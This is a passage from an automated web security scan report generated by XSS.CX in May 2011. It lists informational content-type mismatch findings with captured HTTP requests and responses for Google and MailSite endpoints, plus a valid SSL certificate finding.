Content-Type: text/html
Cache-control: private

<!-- Copyright 1999-2004 Rockliffe Systems, Inc. -->
<!-- stylecfg.asp ver. 5.3.11 -->

<!--

a.sidemenu:link, a.sidemenu:visited, a.sidemenu:active {text-decoration: none; color: #FFFFFF;}
a.si
...[SNIP]...

17.5. http://www.google.com/mbd  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /mbd

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /mbd?q=ColdFusion.required&hl=en&prmd=ivns&mbtype=29&resnum=1&tbo=1&docid=8836100801064732540&usg=303d&zx=1305464010419 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ColdFusion.required
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sun, 15 May 2011 12:53:30 GMT
Expires: -1
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 6956

google.Toolbelt.ascrs('.tbo #ssb #tbp{background-position:-105px -74px}.tbt{margin-bottom:1.2em;font-size:82%}.tbos{padding-top:2px;font-weight:bold}.tbou{padding-top:2px;padding-left:1em}.tbotu{color
...[SNIP]...

17.6. http://www.google.com/realtimejs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /realtimejs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /realtimejs?q=ColdFusion.required&hl=en&sa=X&tbs=rltm:1&prmd=ivns&ei=0MzPTYahNKT40gHl_JHvDQ&polltype=mb&since=1305463416000000&sessionstart=1305463416000000&usg=6fb3 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ColdFusion.required
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sun, 15 May 2011 12:53:40 GMT
Expires: -1
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 290

mbrt0.insert('{\x22nextRequest\x22:\x22/realtimejs?q\\x3dColdFusion.required\\x26hl\\x3den\\x26sa\\x3dX\\x26output\\x3dsearch\\x26tbs\\x3drltm:1\\x26prmd\\x3divns\\x26ei\\x3d0MzPTYahNKT40gHl_JHvDQ\\x2
...[SNIP]...

17.7. http://www.google.com/realtimepts  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /realtimepts

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /realtimepts?q=ColdFusion.required&hl=en&sa=X&tbs=rltm:1&prmd=ivns&ei=0MzPTYahNKT40gHl_JHvDQ&usg=8268 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ColdFusion.required
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=a2WEVV1pGyLhyzX0eoyN4112Szbl5bsuUuXxvplDzxL5iTKqoNP1PX_CW9GigJ-rF89o0HmEaBAsnNxGYLXTFSFUaLSafQW5LDzXiCTk9VqmvR_H7O1dB7XZ5-UALZuy

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Sun, 15 May 2011 12:53:38 GMT
Expires: -1
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 20

mbrtpl.insert('{}');

17.8. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ColdFusion.required HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=46=SIxFXl-Do7C54Kob7mNzCSIXn4Q-82nQ7PL6feAzWGgBE1y2vorG4BcMyEbm1l34C9wpWmxmuxEecah4Q1rQWZcSVEySpmZMoG3SEfPjUnvrSdMVzPE3gQcbLz7UqJyz

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:53:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 20619

ShjDd-Or....S....L..S......F......s#...ColdFusion.required.7%...tszPTYGDEui40QHW25TpDQ",kEXPI:"17259,23756,24692,24878,24879,25907,27400,28505,29229,29685,29795,29822,29840,29956,30152,30201,30251,302
...[SNIP]...

17.9. http://www.mailsite.com/quicklinks.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mailsite.com
Path:   /quicklinks.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /quicklinks.js HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=OBGBGCODHNJGPCDNLDDEOMFA

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Nov 2010 09:03:11 GMT
Accept-Ranges: bytes
ETag: "8031ff1aff7bcb1:4eef"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 12:59:34 GMT
Content-Length: 892

Menu9=new Array("<table cellpadding='0' cellspacing='0' border='0' width='100%' height='100%'><tr><td width='70px'><div style='color: white; font-family: verdana,arial; font-weight: normal; font-style
...[SNIP]...

18. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  totalcontrol.hotchilli.net
Issued by:  UTN-USERFirst-Hardware
Valid from:  Thu Feb 17 18:00:00 CST 2011
Valid to:  Mon Feb 20 17:59:59 CST 2012

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Sun May 15 08:03:23 CDT 2011.